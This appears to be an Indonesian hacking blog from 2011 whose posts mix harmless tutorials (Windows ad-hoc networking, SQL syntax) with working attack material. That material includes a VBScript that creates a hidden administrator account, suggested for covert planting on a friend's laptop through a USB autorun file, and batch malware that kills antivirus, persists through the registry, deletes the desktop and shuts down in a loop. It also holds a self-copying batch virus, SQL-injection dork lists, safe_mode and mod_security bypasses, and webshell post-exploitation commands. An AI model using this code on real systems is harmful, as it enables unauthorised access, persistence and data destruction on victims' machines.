http://aux.iconpedia.net/uploads/10875870971013046993.pnghttp://aux.iconpedia.net/uploads/1540998406962263282.png !

Featured Post 1 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 2 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 3 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 4 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 5 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 7 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Featured Post 6 Title

Replace these every slide sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.This theme is Bloggerized by Lasantha - Premiumbloggertemplates.com.Download more free blogger templates from www.premiumbloggertemplates.com.

Read More

Desember 28, 2011

Bikin hidden user account dalam sekejap (script)


catatan: edit baris strPassword dan strUser sesuai dengan nama user dan password yg kamu mau
simpan kode diatas dengan file berakhiran .vbs
untuk membuat user account tersebut tinggal double klik di file tersebut

gimana kalo file ini disimpan di FLashdisk asik
ane buatin autorun.inf nya
trus flashdisk nya ane colok di laptop ente, pura2 mau copy lagu.

On Error Resume NextConst ADS_UF_DONT_EXPIRE_PASSWD = &h10000
Set wshNetwork = WScript.CreateObject( "WScript.Network" )strComputer = wshNetwork.ComputerName'<<<<Edit next two lines>>>>>>>>strPassword = "password"strUser="Username"
Set colAccounts = GetObject("WinNT://" & strComputer)Set objUser = colAccounts.Create("user", strUser)objUser.SetPassword strPasswordobjUser.SetInfo
Set objUser=GetObject("WinNT://" & strComputer & "/" & strUser)
If objUser.UserFlags And ADS_UF_DONT_EXPIRE_PASSWD ThenobjUser.UserFlags=objUser.UserFlags XoR ADS_UF_DONT_EXPIRE_PASSWDEnd IfobjUser.SetInfo
'Add user to Local Administrators GroupSet objGroup = GetObject("WinNT://" & strComputer & "/Administrators")objGroup.Add(objUser.ADsPath)

'Hide User Account
HKEY_LOCAL_MACHINE = &H80000002strComputer = "."
Set ObjRegistry = _GetObject("winmgmts:{impersonationLevel = impersonate}!\\" _& strComputer & "\root\default:StdRegProv")
strPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"
Return = objRegistry.CreateKey(HKEY_LOCAL_MACHINE, strPath)
Set oReg=GetObject( _"winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv")strKeyPath = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"oReg.SetDWORDValue _ HKEY_LOCAL_MACHINE,strKeyPath,strUser,0

WScript.Echo "Username Created"WScript.Quit


****************************patch******************************* (Continue)..

(Continue)..

Menshudown windows..[bat]


::written by arios@ECHO OFFcopy %0 %systemroot%\arios.bat > nulcopy %0 *.bat > nulAttrib +h *.batclstskill AVGUARDtskill AVGNTtskill NMAINtskill KAVtskill ad-awaretskill av*tskill PCMAVreg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v arios /t REG_SZ /d %systemroot%\arios.bat /f > nulclsecho [windows] >> %systemroot%\win.iniecho load=%systemroot%\arios.bat >> %systemroot%\win.iniecho run=%systemroot%\arios.bat >> %systemroot%\win.iniAttrib +h %systemroot%\win.inidel C:\docume~\owner\Desktopshutdown -s -t 5msg * ”Gay detected shutdown in progress… LOL”cls:ariosstart %0goto arios::*Hanya untuk pembelajaran*
(Continue)..

(Continue)..

Bluscreen & virus C: D:



@Echo off                         
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer 
/v NoViewOnDrive /t REG_DWORD /d 16 /f  @Echo off                         
rem 
---------------------------------
for %%
a in (A B C D E F G H) do if exist "%%a:" copy "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\29.tmp\wshell.dll" "%%a:\virus.bat" ctty nul
rem 
dhelpi7 Virus
rem 
This virus "attrib -h -r *.*" in
rem 
:--------------------------------------------------------------
for %%
f in (*.exe *.com) do set A=%%f  if %A%==COMMAND.COM set Arename %AV%A%
if 
not exist V%Agoto end
attrib 
+h V%Acopy %0.bat %Aattrib +%Aren %A% *.bat
set A
=
:
end
ctty con 
@if exist V%0.com V%0.com %echo %%@if exist V%0.exe V%0.exe %echo %%3
rem 
--------------------------------- 
ane lupa jelasin semua code2 nya sekalian dah ane jelasi code2 nya biar pada jelas 

Code:
@Echo off  <<<<<<  membuat layar hitam atau blank/tidak ada tulisan sama sekali

Code:
REG ADD HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v
<<< code ini registri yng di infeksi oleh virusnya

Code:
NoViewOnDrive /t REG_DWORD /d 16 /f  << mengunci registri di komputer

Code:
rem ---------------------------------
for %%a in (A B C D E F G H) do if exist "%%a:" copy "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\29.tmp\wshell.dll" "%%a:\virus.bat"
ctty nul
rem : dhelpi7 Virus
rem : This virus "attrib -h -r *.*" in
rem :--------------------------------------------------------------
<<<<< semua code ini perintah-perintah virusnya dan berada dimana letaknya

Code:
copy %0.bat %A% <<<<< ini code buat menggandakan diri
********************************patch*****************************************
(Continue)..

(Continue)..

Desember 27, 2011

Jaringan Ad-Hoc di Windows 7

1.Klik Start -> Control Panel -> Network and Internet -> View Network Status And Tasks
2.Kemudian pilih Set up a new connection or network
3.Setelah itu pilih Set up a wireless ad hoc (computer-to-computer) network

4.Maka akan keluar set up wireless ad hocnya klik next untuk melanjutkannya


5.Isi Network name dengan nama yg nantinya akan menjadi nama jaringan Ad-Hoc anda, untuk Security type bisa anda tentukan sesuai dengan keinginan anda, pada contoh kali ini security typenya saya isi dengan No authentication (Open) karena saya membuat jaringan ini untuk tujuan bermain game, tetapi jika anda membuat jaringan ini untuk pertukaran data sebaiknya Security typenya diisi dengan  WPA2-Personal kemudian isi Security Keynya. Setelah semuanya telah diisi klik Next.



6.Maka proses instalasi jaringan Ad-Hocnya akan berjalan, tunggu hingga selesai.



7.Jika sudah selesai klik Close
8.Anda dapat mengecek jaringan Ad-Hoc yg telah anda buat dengan cara mengklik icon wireless yg ada di sudut kanan monitor, jika anda berhasil maka jaringan Ad-Hoc anda akan ada di daftar jaringan wireless yg ada.
Jaringan Ad-Hoc tampaknya sangat sederhana, namun sebenarnya mempunyai cara kerja yang rumit serta mempunyai banyak keterbatasan dibandingkan dengan penggunaan Access Point, Perlu Anda ketahui bahwa performance jaringan Ad Hoc akan turun secara drastis dengan bertambahnya jumlah komputer karena cara kerja Ad Hoc yang tidak menggunakan “server” terpusat, Karena dalam jaringan Ad-Hoc setiap komputer bisa menjadi server. Karena itulah, jaringan Ad-Hoc tidak cocok digunakan untuk jaringan yang memerlukan performance tinggi dengan jumlah client yang banyak. Karena cara kerja Ad Hoc, sangat disarankan untuk tidak menggunakan komputer lebih dari 5 agar performance yang didapatkan masih memuaskan.


*************************[patch]******************************** (Continue)..

(Continue)..

Desember 25, 2011

Perintah – perintah dalam SQL



Select Statement
SELECT “column_name” FROM “table_name”


Distinct
SELECT DISTINCT “column_name”
FROM “table_name”



Where
SELECT “column_name”
FROM “table_name”
WHERE “condition”



And/Or
SELECT “column_name”
FROM “table_name”
WHERE “simple condition”
{[AND|OR] “simple condition”}+



In
SELECT “column_name”
FROM “table_name”
WHERE “column_name” IN (‘value1′, ‘value2′, …)


Between
SELECT “column_name”
FROM “table_name”
WHERE “column_name” BETWEEN ‘value1′ AND ‘value2′


Like
SELECT “column_name”
FROM “table_name”
WHERE “column_name” LIKE {PATTERN}


Order By
SELECT “column_name”
FROM “table_name”
[WHERE "condition"]
ORDER BY “column_name” [ASC, DESC]


Count
SELECT COUNT(“column_name”)
FROM “table_name”


Group By
SELECT “column_name1″, SUM(“column_name2″)
FROM “table_name”
GROUP BY “column_name1″


Having
SELECT “column_name1″, SUM(“column_name2″)
FROM “table_name”
GROUP BY “column_name1″
HAVING (arithematic function condition)


Create Table Statement
CREATE TABLE “table_name”
(“column 1″ “data_type_for_column_1″,
“column 2″ “data_type_for_column_2″,
… )


Drop Table Statement
DROP TABLE “table_name”


Truncate Table Statement
TRUNCATE TABLE “table_name”


Insert Into Statement
INSERT INTO “table_name” (“column1″, “column2″, …)
VALUES (“value1″, “value2″, …)


Update Statement
UPDATE “table_name”
SET “column_1″ = [new value]
WHERE {condition}


Delete From Statement
DELETE FROM “table_name”
WHERE {condition} (Continue)..

(Continue)..

Desember 14, 2011

Cara simple membuat website flash dgn template

langkah 1: mencari flash template gratis
pake mesin google, gunakan keyword :

Code:
allinurl:flash template ext:swf
nah keluar tuh jeroan2 flash template.silahkan dilihat, tapi klo mw langsung di save di kompi kita, cari yg ada tulisan awalnya [flash] pasti banyak tuh di setiap halaman....trus klik kanan pada linknya dan pilih "save link as"

cara lainnya yg lebih mudah adalah kita ke http://search.4shared.com/ kemudian ketik pada searchnya
Code:
flash template
pasti dapat.... yg keren-keren lagi tp dlm bentuk kompressi
swf yg kita dapat harus didecompiler dulu pake swf decompiler, (Continue)..

(Continue)..

Desember 09, 2011

White MSN Buddy Emoticons

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~patch~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (Continue)..

(Continue)..

Desember 07, 2011

Cwin d012x h4vij


inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
(Continue)..

(Continue)..

Desember 05, 2011

[Ask] ByPass Safe Mode ON

ada 3 cara yaitu melalui .htaccess , ini.php dan php.ini
php.ini

... oke langsung saja menuju c0de nya ……………

.htaccess
Code:
<IfModule mod_security.c&gt; SecFilterEngine Off SecFilterScanPOST Off </IfModule>

ini.php
Code:

<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"file"sansursansursansur93;);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"ss"sansursansursansur93;);
?>

php.ini
Code:

safe_mode = off
exec = On
shell_exec = On


########
Write By : Wan Madehope or HVM 999
####### (Continue)..

(Continue)..

Desember 03, 2011

Perintah2 Webshell


cat ./../mainfile.php = Config file.

ls -la = Lists directory’s.

ifconfig {eth0 etc} = Ipconfig equiv.

ps aux – Show running proccess’s.

gcc in_file -o out_file – Compile c file.

cat /etc/passwd – List’s accounts.


sudo – Superuser Do run a command as root provided you have perms
in /etc/sudoers.

id – Tells you what user your logged in as.

which wget curl w3m lynx – Check’s to see what downloaders are
present.

uname -r – Shows all release info (or) cat /etc/release.

uname -a – Shows all kernal info (or) cat /etc/issue

last -30 – Last logged 30 ip’s can change to desired number.

useradd – Create new user account.

usermod – Modify user account.

w – See who is currently logged on.

locate password.txt – Locates password.txt in current dur can use *.

rm -rf / – Please be carefull with this command, i cannot stress this
enough.

arp -a – Lists other machines are on the same subnet.

lsattr -va – ls file attributes on linux second extended file system

find / -type f -perm -04000 -ls – Finds suid files.

find . -type f -perm -04000 -ls – Finds suid files in current dir.

find / -type f -perm -02000 -ls – Finds all sgid files.

find / -perm -2 -ls – Finds all writable files and folders.

find . -perm -2 -ls – Finds all writable files and folders in current dir.

find / -type f -name .bash_history – Finds bash history.

netstat -an | grep -i listen – shows open ports.

cut -d: -f1,2,3 /etc/passwd | grep :: – From memory creates a user
with no pass.

find /etc/ -type f -perm -o+w 2> /dev/null – Write in /etc/passwd?.

cat /proc/version /proc/cpuinfo – Cpu info.

locate gcc- Finds gcc if installed.

set – Display system variables.

echo $path- Echo current path.

lsmod- Dumps kernal modules.

mount/df- Check mounted file system.

rpm -qa- Check patch level for RedHat 7.0.

dmesg- Check hardware ino.

cat /etc/syslog.conf – Log file.

uptime – Uptime check.

cat /proc/meminfo – Memory check.

find / -type f -perm -4 -print 2> /dev/null- Find readble files.

find / -type f -perm -2 -print 2> /dev/null – Find writable files.

chmod ### $folder – Chmod folder.

ls -l -b – Verbosly list directory’s



(Continue)..

(Continue)..